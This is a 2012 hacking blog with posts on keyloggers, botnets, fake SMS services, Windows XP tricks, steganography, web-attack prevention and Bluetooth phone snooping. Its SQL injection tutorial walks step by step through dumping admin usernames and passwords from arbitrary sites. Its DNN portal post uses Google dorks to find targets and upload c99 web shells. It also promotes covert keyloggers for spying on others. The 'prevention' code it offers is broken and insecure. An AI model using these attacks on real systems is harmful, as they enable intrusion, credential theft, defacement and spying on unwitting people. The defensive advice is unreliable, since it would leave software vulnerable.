Saturday, 25 August 2012

Keylogger

Joon Hospital | 2:36:00 pm | Be the first to comment!

Keylogger Tutorial


Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.


 About keyloggers

key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.

A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP
 Tools:

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.
This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
  • Security - allows you to protect program settings, Hidden Mode and Log file.
  • Application monitoring - keylogger will record the application that was in use that received the keystroke!
  • Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
  • Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
  • Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
  • Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
  • It records every keystroke. Captures passwords and all other invisible text.
Other Features:
  • Windows 2000/2003/XP/Vista/Windows 7 support
  • Monitors multi-user machines
  • Automatic startup
  • Friendly interface
  • Easy to install
 
Download Ardamax Keylogger (1.94Mb)


Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7

The latest, improved and most stealth version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for the registered users, we no longer offer the trial version of the latest builds. The localized versions of Perfect Keyloger and 64-bit version are also available after purchase. The last public version is still available
, but keep in mind that it's not the latest and may be flagged by security software.

Download Perfect keylogger
 http://youtu.be/2NWVnbxR4rw

          youtube vidio
Read more ...

Botnet (Study Porpose only)

Joon Hospital | 2:26:00 pm | Be the first to comment!

   


A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.


Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.


A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)


There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.


Different Types of Bots


Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot


These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot


Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots

These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.

Malicious Uses of Botnets

Types Of Botnet Attack
Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware
Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

Adware
Its exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring

A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).
Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.
Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.
Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.
Read more ...

How To Send Fake Sms

Joon Hospital | 2:16:00 pm | Be the first to comment!

Send Fake SMS

SMS Global
Send fake sms from this website..
Make sign up and u will get 25 sms as trial..

www.smsglobal.com
SMS Mafia
SmsMafia is a web texting application.
This Service Is Completely Anonymous.Your Mobile No. Will Not Be Shown Anywhere.


http://smsmafia.in/
Read more ...

Window XP hacking || Only For Study Porpose

Joon Hospital | 1:11:00 pm | Be the first to comment!





window hack             


>>Open COMMAND PROMPT while Locked by User.


  >open notepad
>type www.command.com
> then save as cmd.bat at desktop
>then enter now its open.....enjoy

>>If your computer is slow?
then clean up the ram..

>Open notepad
>type FREEMEM=SPACE(64000000)
>Save it as ram.vbs
now run the script.
Check out !!


>>CracK BIOS Password

>Open the CPU
>Observe the Motherbord
>Remove the Silver Battery(3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period " . "
Then press Enter

>>If ur PC is hanged then do this.

  Press shift+ctrl+esc or ctrl+alt+del
n den click on 'END TASK'
ur PC is runing now

>>create folder without name

>select any folder
>rename it
>press alt & type 0160 or 255
>enter

>>Amazing trick for use 

Windows Backup Utility if installed
go to run
type ntbackup
ok
Now use backup


>>Increase the speed of your file sharing


Simple Way to Share Multiple Folders :
Goto Run and Type SHRPUBW.EXE then press Enter
Select the folder you want to share and Set permissions,
your share folder is ready now..... 


>>Turning off the Help on Min, Max, Close Icons


 
When the mouse goes over the minimize, maximize and close icons on the upper
right hand side of a window.

To disable that display:
1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Create a String Value called MinMaxClose
4. Give it a value of 1
5. Reboot


>>FIX CORRUPTED FILE IN WINDOW XP
 

 1.Load XP cd into cd drive

2. go to Run

3. type sfc/scannowok

4. Then copy its lost file frm cd.


 
>>AUTO DELETE TEMPORARY FOLDER.!!

 
what i prefer is %temp% " without quotes.. at Start -> Run.. this opens ur temp folder n den u cal erase it nearly
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in
that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.



>>Locking Folders:
  • Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
  • Now open the Notepad and type the following
[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
  • Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
  • Open another new notepad text file and type the following
[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]
  • Save the text file as key.bat in the same drive.
Steps to lock the folder:
  • To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
>>Locking Drives:
We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
  • Start & Run and type Regedit to open Registry editor
  • Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
  • Create a new DWORD value NoViewOnDrive and set its value as
2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
  • To lock more drives, calculate the value of each drive and then set sum of those numbers as value
  • To unlock your drive just delete the key from the registry.
>>To Remove Recyle Bin From Your Desktop
 
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.

>>Disable the Security Center warnings
 
Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Here in right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.


>>HIDE DRIVES
How to Hide the drives(c:,d:,e:,a:...etc)


To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 \Explorer

2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4.Restart the computer.

5.Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

>>Show your name in taskbar


 Trick to Show Your name after time in taskbar...
Try this trick to add up ur name in place of AM and PM beside time Its simple

Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK
 Done
Read more ...

Learn How To Hack Websites With Different Techniques.. (EDUCATIONAL PURPOSE ONLY)

Joon Hospital | 1:01:00 pm | Be the first to comment!
  

SQL Injection in MySQL Databases:-


SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.


Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:

www.site.com/page=1


or

www.site.com/id=5


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:


www.site.com/page=1'


If the database is vulnerable, the page will spit out a MySQL error such as;


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29


If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:


www.site.com/page=1 order by 1--

http://www.site.com/page=1 order by 2--

http://www.site.com/page=1 order by 3--

http://www.site.com/page=1 order by 4--

http://www.site.com/page=1 order by 5--


If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,

for example:

www.site.com/page=1 union all select 1,2,3,4--


This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:

user()

database()

version()

or if these dont work try...

@@user

@@version

@@database


For example the url would look like:

www.site.com/page=1 union all select 1,user(),version(),4--


The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.

UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

So the url would look like:

www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--


Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:


union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7


Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,

union all select 1,2,group_concat(username,0x3a,password),4 from admin--

So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--


Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

            ANOTHER METHOD


      Portal Hacking (DNN) Technique:-

       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks

1- inurl:"/portals/0"


2- inurl:/tabid/36/language/en-US/Default.aspx

You can also modify this google dork according to your need & requirement


Here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :

http://www.google.com


Step 2:

Now enter this dork

:inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:

you will find many sites, Select the site which you are comfortable with.


Step 4:

For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx


Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx


with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6: You will get a Link Gallary page.So far so good!


Step 7: Dont do anything for now,wait for the next step...


Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will Find the Upload Option

Step 10:

Select Root

Step 11:

Upload your package Your Shell c99,c100 , Images, etc


After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.

Now  Go to main page and refresh. you have seen hacked the website.


Done..!!

BEST TOOL FOR SQL INJECTION

 

Havij – Advanced Automated SQL Injection Tool

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injection vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Havij - SQL Injection Tool
There is a free version available and also a more fully-featured commercial edition available here.
You can download Havij v1.12 Free Edition here:
Or read more here.

 

 



Read more ...

Steganography

Joon Hospital | 12:28:00 pm | Be the first to comment!

Steganography



What is Steganography?


 Steganography is the art and science of hiding information by embedding messages within other, seemingly harmless images or other types of media.

The word steganography is of Greek origin and means "concealed writing". The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.

It originated with the Greeks, and it means “covered writing”. It can be traced back for centuries, when messengers used to shave their heads, tattoo the message to their head, then wait until their hair grew back, travel to their destination, and finally shave their head again to reveal the message. Another technique that was used was etching a message in a wooden tablet, and then covering it with was. They also used invisible ink, null ciphers, and microdots to convey messages. Steganography has come a long way since those days. Now, steganography is the altering of bits in either an image, sound document, or even another document, to hide a message.

Steganography has become increasingly popular in the past years, due to the explosion of the internet and multi-media use in general. Most of the attention has been drawn now because of the malicious use of the technique. It has been used for terrorism, fraud, espionage, etc. It has become a threat not only to individuals and businesses, but to government agencies and homeland security, not just in the United States, but all across the world. This is why there is now a growing interest in steganalysis, which is the detection of embedded data. The problem is, there are so many methods to embed the information, it is hard to develop programs to distinguish between the different types. There are over 100 free steganography programs, such as Outguess, available on the internet, and it is reported that there have been over 1 million downloads of this software, which goes to show how popular steganography is becoming. It is not always used in a malevolent manner, some people just like to keep their private information secret, or use it as another way to encrypt important information, but the fact is that it can be used in a criminal way, and that is what the concern is about.

What are some steganography programs?

          Not only are there several programs that hide information, there are several different methods for doing so. There are three basic ways: injection, substitution, and generation. With injection, the idea is to find areas in the file that are not being used, like at the end of a song for example, and insert the data in that space. Substitution finds the least significant bits, and places the hidden document there. Generation creates an entirely new file, based around the information that you want hidden, for example, creating an image of a painting based on the bits that are in the file.

            There are also several different programs, with their own methods that all fall under one of the above mentioned categories. Outguess is one such program, it is a universal steganographic tool that allows the insertion of hidden information into the redundant bits of data sources. It determines the maximum amount of information that can be inserted into a jpeg without changing the statistical counts, making it difficult to find using statistical tests. There are also several others such as S-tools.

What is Steganalysis?


           Steganalysis is simply the detection of steganography by a third party. This is a relatively new field, since the new technology behind steganography is just becoming popular.  There are two main types of steganalysis: visual analysis and statistical (algorithmic) analysis.
Visual analysis tries to reveal the presence of hidden information through inspection with the naked eye or with the assistance of a computer, which can separate the image into bit planes for further analysis.
Statistical analysis is more powerful and successful, because it reveals the smallest alterations in an image’s statistical behavior. There are several statistical tests which can be run on an image: average bytes, variations of the bytes, skew, kurtosis, average deviation and differential values.
  

Technical Steganography

Technical steganography offers a broad variety of methods. It is nearly impossible to divide up all these methods. & Its uses scientific methods to hide a message, such as the use of invisible ink or microdots and other size-reduction methods.

Some methods of technical steganography are:

Invisible Ink
One of the methods with the longest tradition.

Microdots
A method that can be used to hide up to one page in a dot.

Computer-based Methods
Uses redundant information in texts, pictures, sounds, videos, ...

Linguistic Steganography
Linguistic steganography hides the message in the carrier in some nonobvious ways and is further categorized as semagrams or open codes.

Open Codes
The openly readable text is in the case of open codes mostly well constructed. It can contain certain words or sentences, certain letters can be on certain places in the text or words can be hidden in vertical or reversed position.

The main methods are:

Masking
In a text there could be sentences or words starting with certain letters, which have another meaning. There can also be metaphors, etc. In so far all kinds of jargons are in fact masking.

Cues
A certain word appearing in the text transports the message. This message is very often used in wartime to broadcast information to resistance groups in the enemy's country.

Null-ciphers
The hidden text could be reconstructed by taking the first (second,...) letter of each word (or after the punctuation mark, etc.).
Hidden messages could also be found vertically, diagonally or in reversed order. It could also be necessary to re-write the open text in other form (e.g. with a certain number of letters per line).


Semagrams hide information by the use of symbols or signs. A visual semagram uses innocent-looking or everyday physical objects to convey a message, such as doodles or the positioning of items on a desk or Website. A text semagram hides a message by modifying the appearance of the carrier text, such as subtle changes in font size or type, adding extra spaces, or different flourishes in letters or handwritten text.
   
 As an increasing amount of data is stored on computers and transmitted over networks, it is not surprising that steganography has entered the digital age. On computers and networks, steganography applications allow for someone to hide any type of binary file in any other binary file, although image and audio files are today's most common carriers.

Steganography provides some very useful and commercially important functions in the digital world, most notably digital watermarking. In this application, an author can embed a hidden message in a file so that ownership of intellectual property can later be asserted and/or to ensure the integrity of the content. An artist, for example, could post original artwork on a Website. If someone else steals the file and claims the work as his or her own, the artist can later prove ownership because only he/she can recover the watermark . Although conceptually similar to steganography, digital watermarking usually has different technical goals. Generally only a small amount of repetitive information is inserted into the carrier, it is not necessary to hide the watermarking information, and it is useful for the watermark to be able to be removed while maintaining the integrity of the carrier.

>>Steganography Tools:-


Online Tools

   http://www.spammimic.com                   


Softwares:

1. S Tools

S-Tools hides in a variety of cover media. This software is a good illustration of different versions hiding in different media. These versions cover hiding in BMP, GIF, WAV, and even on unused floppy disk space.

Download:-  http://www.spychecker.com/program/stools.html

2.MP3Stego.

which hides text files within larger text files, and lastly a tool that hides files in MP3s called MP3 Stego

Download:- http://www.petitcolas.net/fabien/steganography/mp3stego/index.html

3.Steganos Suite

Tested one commercial steganography product, Steganos Suite.

4.Camouflage 2.0

5.Dmagic.

Hides files and folders on Windows systems

6.Hermetic Stego

by Peter Meyer, Hermetic Systems This program is capable of hiding in a BMP image or across multiple BMP images.

Download:- http://www.hermetic.ch/hst/hst.htm

7.jpeg-jsteg

 DOS hides information in the DCT coefficients of JPEG's JFIF image format.

Download:- http://www.nic.funet.fi/pub/crypt/steganography/

8.Snow

Snow (also variants include !SnowDOS, SnowJava, JSnow By Matthew Kwan is available in both DOS and JAVA executable formats. "snow exploits the steganographic nature of whitespace. Locating trailing whitespace in text is like finding a polar bear in a snowstorm. And it uses the ICE encryption algorithm, so the name is thematically consistent.

Download:- http://www.darkside.com.au/snow/index.html/ 

9.Steghide      

Source code is aviailable and several ports are available for different operating systems. IMAGES: (BMP) AUDIO: (WAV, AU )

Download :- http://steghide.sourceforge.net/

10.wbStego

wbStego is a steganography to hide data in bitmaps, text files and HTML files.

Download:-  http://www.8ung.at/wbailer/wbstego/

 

practical view

 

Hide File In Image


HOw Can We Hide The File In Image.


1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder


-The image will hereby be referred to in all examples as xyz.jpg

-The file will hereby be referred to in all examples as New Text Document.txt


2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)


3. Open command prompt by going to Start > Run > cmd


4. In Command Prompt, navigate to the folder where your two files are by typing

cd location [ex: cd C:\New Folder]


5. Type [copy /b xyz.jpg + secret.rar xyz.jpg] (remove the brackets)


Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.


In order to view/extract your file, there are two options that you can take


a) Change the file extension from xyz.jpg to xyz.rar, then open and your file is there

b) Leave the file extension as is, right click, open with WinRar and your file is there


EnJoy HacKinG...

 

Read more ...

Web Site Security(How To Prevent From SQL Injection

Joon Hospital | 12:14:00 pm | Be the first to comment!

                        Website Security

                                                                                      


How Can We Block Common Web Attacks And Protect Our Website..

A: SQL Injection
-->Types                   
  •  Login Form Bypassing
  •   UNION SQL Injection
           B: Cross Site Scripting
                             --> Cross Site Request Forgery
C: File Inclusion
          Types-> Remote File Inclusion and Remote Code Execution
   

On this post i am telling about five types of common web attacks, which are used in most types of defacements or dumps of databases.
The five exploits listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, we missed out some website code tags..
coz of this we get website attacks and allows the hacker for attack on vulnerable website.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

A: SQL Injection

--> LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:

Password:



login.php file:

// EXAMPLE CODE
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>

We can simply bypass this by using ' or '1=1', which will execute "password = ''or '1=1'';".

Alternatively, the user can also delete the database by executing "' drop table database; --".

PREVENTION:

Use mysql_real_escape_string in your php code.

Example:


$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = "'$badword'";
echo "Blocked " . $message . ";
?>

--> UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity)
as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'

No error--> http://www.site.com/website.php?id=1 ORDER BY 1-- 

 Two columns, and it comes back with an error! This means that there is one column.
 http://www.site.com/website.php?id=1 ORDER BY 2--

Selects the all the columns and executes the version() command on the only column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()--

SOLUTION:

Add something like below to prevent UNION SQL injection.

$evil = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($evil, "", $patch);

>-------------------------------------------------------<

B: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in.
 Two types of XSS (cross site scripting) are persistent XSS and non-persistent XSS.

Example:
http://www.site.com/search.php?q=">

SOLUTION
(javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

C: File Inclusion

 Types: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still
vulnerable to the vulnerability. RFI usually leads to remote code execution or javascript execution.

Example of the vulnerable code:


include($_GET['page']);
?>

Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/xyz.txt?

SOLUTION:

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}

For remote code execution, the site would have to have a php executing command. You would patch this by about doing the same thing.
Read more ...

Mobile Bluetooth Hack

Joon Hospital | 12:04:00 pm | Be the first to comment!

Mobile Bluetooth Hacking:

Here is a list of what you can do when you have hacked the other phone. Have Fun!

  • Read Messages. (They are no more personal!)

  • Read Contacts. (Check your lover’s phonebook to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)

  • Change Profile (Change the other’s profile to silent mode when you are on a date!)

  • Play Ringtone even if the phone is silent (Annoy your classmates!)

  • Play songs from the hacked phone in the same phone.

  • Restart the phone (Show some magic to your friends!)

  • Switch off the phone (Ultimate thing that you can do!)

  • Restore Factory Settings (Do this to the most organized one and run away quickly!)

  • Change Ringing Volume (You have enough experience how to use it. Don’t you?)

bluetooth-hack

